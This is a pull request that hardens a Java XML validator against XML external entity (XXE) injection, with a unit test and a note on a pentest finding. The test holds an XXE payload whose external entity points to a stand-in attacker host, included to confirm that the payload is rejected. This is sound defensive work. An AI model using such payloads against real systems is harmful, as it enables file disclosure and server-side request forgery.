### PR TITLE
Resolve XXE vulnerability in XML validation

### DIFF
--- a/manage-server/src/main/java/manage/validations/XMLFormatValidator.java
+++ b/manage-server/src/main/java/manage/validations/XMLFormatValidator.java
@@ -3,6 +3,7 @@ package manage.validations;
 import org.everit.json.schema.FormatValidator;
 import org.xml.sax.SAXException;
 
+import javax.xml.XMLConstants;
 import javax.xml.parsers.DocumentBuilderFactory;
 import javax.xml.parsers.ParserConfigurationException;
 import java.io.ByteArrayInputStream;
@@ -11,12 +12,16 @@ import java.util.Optional;
 
 public class XMLFormatValidator implements FormatValidator {
 
+    private static final String FEATURE_DISABLE_DOCTYPE = "http://apache.org/xml/features/disallow-doctype-decl";
+
     @Override
     public Optional<String> validate(String subject) {
         DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
         factory.setValidating(false);
         factory.setNamespaceAware(true);
         try {
+            factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
+            factory.setFeature(FEATURE_DISABLE_DOCTYPE, true);
             factory.newDocumentBuilder().parse(new ByteArrayInputStream(subject.getBytes()));
         } catch (ParserConfigurationException | SAXException | IOException e) {
             return Optional.of(e.toString());

--- a/manage-server/src/test/java/manage/validations/XMLFormatValidatorTest.java
+++ b/manage-server/src/test/java/manage/validations/XMLFormatValidatorTest.java
@@ -3,8 +3,7 @@ package manage.validations;
 import manage.TestUtils;
 import org.junit.Test;
 
-import static org.junit.Assert.assertFalse;
-import static org.junit.Assert.assertTrue;
+import static org.junit.Assert.*;
 
 public class XMLFormatValidatorTest implements TestUtils {
 
@@ -14,6 +13,20 @@ public class XMLFormatValidatorTest implements TestUtils {
     public void validate() throws Exception {
         assertTrue(subject.validate("nope").isPresent());
         assertFalse(subject.validate(readFile("/xml/expected_metadata_export_saml20_sp.xml")).isPresent());
+    }
+
+    @Test
+    public void validateWithXxe() {
+        String xxe = "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>\n" +
+                "<!DOCTYPE foo [\n" +
+                "  <!ELEMENT foo ANY >\n" +
+                "  <!ENTITY xxe SYSTEM \"http://www.attacker.com/text.txt\" >]>\n" +
+                "<foo>&xxe;</foo>";
+
+        String result = subject.validate(xxe).orElse(null);
+
+        assertNotNull(result);
+        assertTrue(result.contains("DOCTYPE is disallowed when the feature \"http://apache.org/xml/features/disallow-doctype-decl\" set to true."));
     }
 
 }


### PR DESCRIPTION
Hi all,

Another finding from our recent pentest is the vulnerability of the XMLFormatValidator to XXE injection. We have implemented a solution in accordance with the OWASP guideline on this page: https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
We have opted for the solution that will have consequences for XML metadata including DTD, namely that it will be completely disabled. This solution is described as the safest solution and is acceptable in our case.
If required, we can also share the exact scenario and example XML for reproducing this, either here or via other channels :)
Please let us know if you agree with this approach.
